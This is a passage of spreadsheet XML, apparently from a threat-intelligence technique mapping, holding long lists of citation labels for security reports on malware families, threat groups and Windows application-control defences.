    <t>(Citation: ESET InvisiMole June 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Palo Alto Reaver Nov 2017),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: Anomali MUSTANG PANDA October 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Unit 42 WhisperGate January 2022),</t>
  </si>
  <si>
    <t>(Citation: Cofense RevengeRAT Feb 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: Qualys LolZarus),(Citation: KISA Operation Muzabi),(Citation: ESET T3 Threat Report 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: CISA AA20-301A Kimsuky),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Unit 42 TA551 Jan 2021),(Citation: Lazarus APT January 2022),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Github Koadic),(Citation: fsecure NanHaiShu July 2016),(Citation: Symantec Shuckworm January 2022),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Cylance Dust Storm),(Citation: EST Kimsuky April 2019),(Citation: Unit42 Xbash Sept 2018),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: FireEye MuddyWater Mar 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: FireEye FIN7 April 2017),(Citation: Microsoft WDAC)</t>
  </si>
  <si>
    <t>(Citation: Cybereason TA505 April 2019),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Korean FSI TA505 2020),(Citation: Kaspersky Duqu 2.0),(Citation: 360 Machete Sep 2020),(Citation: Profero APT27 December 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: CISA AppleJeus Feb 2021),(Citation: Juniper IcedID June 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: ESET LoudMiner June 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Sophos Maze VM September 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Sophos Ragnar May 2020),(Citation: Rancor Unit42 June 2018),(Citation: Unit42 Molerat Mar 2020),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Crowdstrike Qakbot October 2020),(Citation: Cybereason Clop Dec 2020),(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Cybereason Bumblebee August 2022),</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),</t>
  </si>
  <si>
    <t>(Citation: Red Canary Qbot),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: ESET EvilNum July 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Cyberint Qakbot May 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: ESET OceanLotus Mar 2019),(Citation: KISA Operation Muzabi),(Citation: Cybereason Astaroth Feb 2019),(Citation: ESET Hermetic Wizard March 2022),(Citation: ESET Lazarus Jun 2020),(Citation: Cybereason Valak May 2020),(Citation: FireEye APT32 May 2017),(Citation: ThreatGeek Derusbi Converge),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Lab52 WIRTE Apr 2019),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Talos Cobalt Group July 2018),(Citation: JoeSecurity Egregor 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Github Koadic),(Citation: Unit 42 Valak July 2020),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: ATT QakBot April 2021),(Citation: RedCanary Mockingbird May 2020),(Citation: Proofpoint Leviathan Oct 2017),(Citation: Sophos Ragnar May 2020),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Unit42 Xbash Sept 2018),(Citation: FireEye APT19),(Citation: RSA Shell Crew),(Citation: Malwarebytes Saint Bot April 2021),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Fidelis INOCNATION),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: Secure Host Baseline EMET),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: Talos ZxShell Oct 2014),(Citation: Lotus Blossom Jun 2015),(Citation: Symantec Briba May 2012),(Citation: Prevailion EvilNum May 2020),(Citation: Proofpoint Bumblebee April 2022),(Citation: Cybereason Egregor Nov 2020),(Citation: Cylance Shell Crew Feb 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Kaspersky Carbanak),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: Sophos Ragnar May 2020),(Citation: Medium KONNI Jan 2020),(Citation: Volexity Exchange Marauder March 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CopyKittens Nov 2015),(Citation: Volexity PowerDuke November 2016),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Dell Sakula),(Citation: ESET Hermetic Wizard March 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: FireEye APT29 Nov 2018),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Github Koadic),(Citation: Bitdefender APT28 Dec 2015),(Citation: ESET Operation Groundbait),(Citation: Novetta Winnti April 2015),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Secure List Bad Rabbit),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Rancor Unit42 June 2018),(Citation: Symantec Bumblebee June 2022),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Arbor Musical Chairs Feb 2018),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),(Citation: F-Secure CozyDuke),(Citation: Palo Alto Sofacy 06-2018),(Citation: Gigamon Berserk Bear October 2021),(Citation: ESET Zebrocy May 2019),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Talos Kimsuky Nov 2021),(Citation: Emissary Trojan Feb 2016),(Citation: Unit42 Redaman January 2019),(Citation: ESET Telebots July 2017),(Citation: Symantec Orangeworm April 2018),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Unit 42 TA551 Jan 2021),(Citation: Crysys Skywiper),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit 42 Bisonal July 2018),(Citation: Securelist MuddyWater Oct 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: ESET Turla Mosquito Jan 2018),(Citation: FireEye APT19),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: F-Secure Sofacy 2015),(Citation: Crowdstrike Qakbot October 2020),(Citation: ESET Attor Oct 2019),(Citation: Talos Nyetya June 2017),(Citation: Microsoft Winnti Jan 2017),(Citation: Cybereason TA505 April 2019),(Citation: Red Canary Qbot),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Cyberint Qakbot May 2021),(Citation: ESET Lazarus Jun 2020),(Citation: Talos Seduploader Oct 2017),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: ESET Operation Spalax Jan 2021),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: IBM MegaCortex),(Citation: ATT QakBot April 2021),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: SentinelOne NobleBaron June 2021),(Citation: FireEye Clandestine Fox),(Citation: McAfee Lazarus Jul 2020),(Citation: ESET InvisiMole June 2020),(Citation: Microsoft SIR Vol 19),(Citation: Crowdstrike DNC June 2016),</t>
  </si>
  <si>
    <t>(Citation: Red Canary Verclsid.exe),</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Reaver Nov 2017),(Citation: Dragos Crashoverride 2017),(Citation: Eclypsium Trickboot December 2020),(Citation: TechNet Dir),(Citation: Medium Anchor DNS July 2020),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: ESET Gelsemium June 2021),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: NCC Group APT15 Alive and Strong),(Citation: Unit 42 BadPatch Oct 2017),(Citation: FireEye Metamorfo Apr 2018),(Citation: Eset Ramsay May 2020),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: DFIR Ryuk's Return October 2020),(Citation: McAfee Night Dragon),(Citation: CyberBit Dtrack),(Citation: Securelist ScarCruft May 2019),(Citation: Malwarebytes Dyreza November 2015),(Citation: Cybereason Bazar July 2020),(Citation: ESET Operation Groundbait),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Trend Micro KillDisk 1),(Citation: Rancor Unit42 June 2018),(Citation: BlackBerry CostaRicto November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: BiZone Lizar May 2021),(Citation: US-CERT BADCALL),(Citation: FireEye APT34 July 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET Sednit Part 1),(Citation: Talos Frankenstein June 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Symantec Volgmer Aug 2014),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Cylance Shaheen Nov 2018),(Citation: FireEye APT32 April 2020),(Citation: ESET LightNeuron May 2019),(Citation: TrendMicro Netwalker May 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Kaspersky StoneDrill 2017),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Securelist APT10 March 2021),(Citation: Securelist Denis April 2017),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Trend Micro Tick November 2019),(Citation: Emissary Trojan Feb 2016),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Palo Alto MoonWind March 2017),(Citation: FireEye APT34 Dec 2017),(Citation: CheckPoint Naikon May 2020),(Citation: ESET ForSSHe December 2018),(Citation: Unit 42 Inception November 2018),(Citation: McAfee Honeybee),(Citation: Talos Zeus Panda Nov 2017),(Citation: Check Point Warzone Feb 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: CERT-EE Gamaredon January 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Mandiant UNC3313 Feb 2022),(Citation: Fortinet Agent Tesla April 2018),(Citation: FireEye APT19),(Citation: Symantec Buckeye),(Citation: Palo Alto DNS Requests),(Citation: ESET DazzleSpy Jan 2022),(Citation: GitHub PoshC2),(Citation: Unit 42 CARROTBAT November 2018),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET Dukes October 2019),(Citation: ESET Kobalos Jan 2021),(Citation: Talos ROKRAT 2),(Citation: JoeSecurity Egregor 2020),(Citation: TechNet Systeminfo),(Citation: Cylance Sodinokibi July 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Unit 42 CARROTBAT January 2020),(Citation: ATT QakBot April 2021),(Citation: Palo Alto menuPass Feb 2017),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: NCC Group Chimera January 2021),(Citation: Symantec Naid June 2012),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Lazarus Nov 2020),(Citation: Secureworks Karagany July 2019),(Citation: NCCGroup RokRat Nov 2018),(Citation: Unit 42 Shamoon3 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Prevailion EvilNum May 2020),(Citation: Baumgartner Naikon 2015),(Citation: Securelist BlackEnergy Nov 2014),(Citation: PWC KeyBoys Feb 2017),(Citation: Lazarus RATANKBA),(Citation: Unit42 Sofacy Dec 2018),(Citation: Intel 471 REvil March 2020),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure BlackEnergy 2014),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Mandiant APT1 Appendix),(Citation: Unit42 Azorult Nov 2018),(Citation: Lazarus APT January 2022),(Citation: evolution of pirpi),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Symantec Linfo May 2012),(Citation: RATANKBA),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: McAfee Netwire Mar 2015),(Citation: Talos MuddyWater Jan 2022),(Citation: Talos Promethium June 2020),(Citation: Avira Mustang Panda January 2020),(Citation: McAfee GhostSecret),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Profero APT27 December 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Github PowerShell Empire),(Citation: Symantec Inception Framework March 2018),(Citation: Rapid7 KeyBoy Jun 2013),(Citation: Bitdefender APT28 Dec 2015),(Citation: McAfee Sodinokibi October 2019),(Citation: Novetta Winnti April 2015),(Citation: CME Github September 2018),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cylance Dust Storm),(Citation: Symantec Bumblebee June 2022),(Citation: Anomali Rocke March 2019),(Citation: Unit42 BabyShark Feb 2019),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CrowdStrike Ryuk January 2019),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Palo Alto Sofacy 06-2018),(Citation: Unit 42 Lucifer June 2020),(Citation: Malwarebytes Higaisa 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: ESET Zebrocy May 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Talos ROKRAT),(Citation: Check Point Meteor Aug 2021),(Citation: Unit 42 Sofacy Feb 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: Talos Group123),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: ESET Grandoreiro April 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: PWC WellMess July 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: ATT Sidewinder January 2021),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Unit 42 Bisonal July 2018),(Citation: Palo Alto OilRig Oct 2016),(Citation: FireEye admin@338),(Citation: FireEye HAWKBALL Jun 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Securelist Kimsuky Sept 2013),(Citation: ESET Attor Oct 2019),(Citation: Fidelis Turbo),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Cybereason Kimsuky November 2020),(Citation: NCSC Cyclops Blink February 2022),(Citation: McAfee Cuba April 2021),(Citation: Korean FSI TA505 2020),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: ClearSky Charming Kitten Dec 2017),(Citation: ESET ComRAT May 2020),(Citation: F-Secure The Dukes),(Citation: Secureworks REvil September 2019),(Citation: DustySky),(Citation: Kaspersky Lyceum October 2021),(Citation: Talos NavRAT May 2018),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Checkpoint Dridex Jan 2021),(Citation: Talos Cobalt Group July 2018),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Symantec Frutas Feb 2013),(Citation: Group IB Ransomware May 2020),(Citation: Palo Alto OilRig May 2016),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Securelist Darkhotel Aug 2015),(Citation: SecureList Griffon May 2019),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Symantec Hydraq Jan 2010),(Citation: McAfee Maze March 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Talos ZxShell Oct 2014),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Check Point APT34 April 2021),(Citation: ESET OceanLotus Mar 2019),(Citation: Cybereason Valak May 2020),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: Unit 42 Nokki Oct 2018),(Citation: ESET OceanLotus),(Citation: CISA WellMess July 2020),(Citation: Microsoft FinFisher March 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Leonardo Turla Penquin May 2020),(Citation: ESET RTM Feb 2017),(Citation: RedCanary Mockingbird May 2020),(Citation: Kaspersky Sodin July 2019),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: Fortinet Agent Tesla June 2017),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Symantec Chafer Dec 2015),(Citation: GitHub Pupy),(Citation: ESET Hermetic Wizard March 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: Securelist Octopus Oct 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Malwarebytes Kimsuky June 2021),(Citation: TrendMicro TropicTrooper 2015),(Citation: ESET LoudMiner June 2019),(Citation: Kaspersky WIRTE November 2021),(Citation: Accenture Lyceum Targets November 2021),(Citation: TrendMicro MacOS April 2018),(Citation: NHS Digital Egregor Nov 2020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: TrendMicro DarkComet Sept 2014),(Citation: Securelist Dtrack),(Citation: SentinelOne Valak June 2020),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Malwarebytes Pony April 2016),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Trend Micro Skidmap),(Citation: Forcepoint Felismus Mar 2017),(Citation: Proofpoint TA505 October 2019),(Citation: FinFisher Citation),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: XAgentOSX 2017),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Accenture Hogfish April 2018),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Konni May 2017),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Novetta Blockbuster Loaders),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist MuddyWater Oct 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: 20 macOS Common Tools and Techniques),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Symantec Dragonfly),(Citation: Antiy CERT Ramsay April 2020),(Citation: Check Point Pay2Key November 2020),(Citation: Bitdefender Naikon April 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Gh0stRAT ATT March 2019),(Citation: S2 Grupo TrickBot June 2017),(Citation: Novetta-Axiom),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Cybereason Chaes Nov 2020),(Citation: SentinelLabs reversing run-only applescripts 2021),(Citation: US-CERT TYPEFRAME June 2018),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: IBM IcedID November 2017),(Citation: Cofense Astaroth Sept 2018),(Citation: ASERT Donot March 2018),(Citation: Group IB GrimAgent July 2021),(Citation: US-CERT Bankshot Dec 2017),(Citation: Microsoft PLATINUM April 2016),(Citation: Prevx Carberp March 2011),(Citation: Unit 42 KerrDown February 2019),(Citation: FireEye APT28),(Citation: Microsoft DUBNIUM July 2016),(Citation: PaloAlto DNS Requests May 2016),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: Cybereason Astaroth Feb 2019),(Citation: Scarlet Mimic Jan 2016),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Molerats Dec 2020),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Bahamut),(Citation: APT15 Intezer June 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: ESET Sednit Part 2),(Citation: Talos GravityRAT),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: Zscaler Kasidet),(Citation: ClearSky Siamesekitten August 2021),(Citation: Proofpoint Azorult July 2018),(Citation: Kaspersky Turla),(Citation: FireEye FiveHands April 2021),(Citation: Fidelis njRAT June 2013),(Citation: Medium KONNI Jan 2020),(Citation: TrendMicro Ursnif Mar 2015),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Symantec Pasam May 2012),(Citation: Talos Oblique RAT March 2021),(Citation: Cisco CaddyWiper March 2022),(Citation: Google EXOTIC LILY March 2022),(Citation: ESET OceanLotus macOS April 2019),(Citation: Cisco Ukraine Wipers January 2022),(Citation: CISA SoreFang July 2016),(Citation: CISA AppleJeus Feb 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: Fysbis Palo Alto Analysis),(Citation: Fortinet Diavol July 2021),(Citation: Symantec Sowbug Nov 2017),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Kaspersky Turla Aug 2014),(Citation: FireEye SMOKEDHAM June 2021),(Citation: FireEye APT33 Sept 2017),(Citation: CrowdStrike Putter Panda),(Citation: PTSecurity Higaisa 2020),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: Unit42 Molerat Mar 2020),(Citation: Proofpoint TA505 Mar 2018),(Citation: Carbon Black Shlayer Feb 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: F-Secure CozyDuke),(Citation: Trend Micro DRBControl February 2020),(Citation: Morphisec ShellTea June 2019),(Citation: CISA Zebrocy Oct 2020),(Citation: FSecure Lokibot November 2019),(Citation: Gigamon Berserk Bear October 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: US-CERT Volgmer Nov 2017),(Citation: Cisco Talos Intelligence Group),(Citation: Microsoft GALLIUM December 2019),(Citation: FireEye APT32 May 2017),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: ESET Telebots July 2017),(Citation: Symantec Orangeworm April 2018),(Citation: Malwarebytes DarkComet March 2018),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: ESET Machete July 2019),(Citation: CheckPoint Bandook Nov 2020),(Citation: Cymmetria Patchwork),(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 ),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: McAfee Oceansalt Oct 2018),(Citation: Fidelis TrickBot Oct 2016),(Citation: Microsoft NICKEL December 2021),(Citation: Crowdstrike Qakbot October 2020),(Citation: GitHub QuasarRAT),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Unit 42 PingPull Jun 2022),(Citation: Kaspersky TajMahal April 2019),(Citation: Qualys Hermetic Wiper March 2022),(Citation: ASERT InnaputRAT April 2018),(Citation: GDATA Zeus Panda June 2017),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Novetta Blockbuster),(Citation: Kaspersky CactusPete Aug 2020),(Citation: Talos Micropsia June 2017),(Citation: Microsoft SIR Vol 21),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Unit 42 Hildegard Malware),(Citation: Trend Micro IXESHE 2012),(Citation: sentinelone shlayer to zshlayer),(Citation: BlackBerry Amadey 2020),(Citation: Talos MuddyWater May 2019),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET PipeMon May 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Radware Micropsia July 2018),(Citation: Group IB Ransomware September 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: ESET InvisiMole June 2020),(Citation: McAfee Babuk February 2021),(Citation: Forcepoint Monsoon),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: Prevailion DarkWatchman 2021),(Citation: BlackBerry Amadey 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Korean FSI TA505 2020),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Group IB GrimAgent July 2021),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FBI Ragnar Locker 2020),</t>
  </si>
  <si>
    <t>(Citation: McAfee Cuba April 2021),(Citation: CrowdStrike Ryuk January 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: NCC Group Team9 June 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: BleepingComputer Molerats Dec 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Talos Zeus Panda Nov 2017),(Citation: FireEye FiveHands April 2021),(Citation: Kaspersky Sodin July 2019),(Citation: Cylance Dust Storm),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Group IB GrimAgent July 2021),(Citation: Unit42 Molerat Mar 2020),(Citation: Microsoft NICKEL December 2021),(Citation: McAfee Maze March 2020),(Citation: Mcafee Clop Aug 2019),</t>
  </si>
  <si>
    <t>(Citation: Microsoft DUBNIUM July 2016),(Citation: Symantec Naid June 2012),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: ESET InvisiMole June 2018),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Palo Alto Reaver Nov 2017),(Citation: CheckPoint SpeakUp Feb 2019),(Citation: McAfee Lazarus Nov 2020),(Citation: Check Point APT34 April 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: Secureworks Karagany July 2019),(Citation: CISA WellMail July 2020),(Citation: Dragos Crashoverride 2018),(Citation: Accenture MUDCARP March 2019),(Citation: Cybereason Valak May 2020),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Talos Olympic Destroyer 2018),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Baumgartner Naikon 2015),(Citation: SecTools nbtscan June 2003),(Citation: Securelist BlackEnergy Nov 2014),(Citation: PWC KeyBoys Feb 2017),(Citation: Lazarus RATANKBA),(Citation: Medium Anchor DNS July 2020),(Citation: McAfee Gold Dragon),(Citation: F-Secure BlackEnergy 2014),(Citation: Talos GravityRAT),(Citation: TrendMicro EarthLusca 2022),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: CISA WellMess July 2020),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: evolution of pirpi),(Citation: NCC Group APT15 Alive and Strong),(Citation: ClearSky Siamesekitten August 2021),(Citation: Leonardo Turla Penquin May 2020),(Citation: TrendMicro Taidoor),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky Turla),(Citation: Unit 42 Playbook Dec 2017),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Volexity PowerDuke November 2016),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Dell TG-3390),(Citation: Trend Micro Cyclops Blink March 2022),(Citation: objsee mac malware 2017),(Citation: IBM Ransomware Trends September 2020),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Sophos New Ryuk Attack October 2020),(Citation: Talos Promethium June 2020),(Citation: Avira Mustang Panda January 2020),(Citation: GitHub Pupy),(Citation: McAfee GhostSecret),(Citation: 360 Machete Sep 2020),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: CISA SoreFang July 2016),(Citation: Securelist Octopus Oct 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: Fortinet Diavol July 2021),(Citation: Symantec Catchamas April 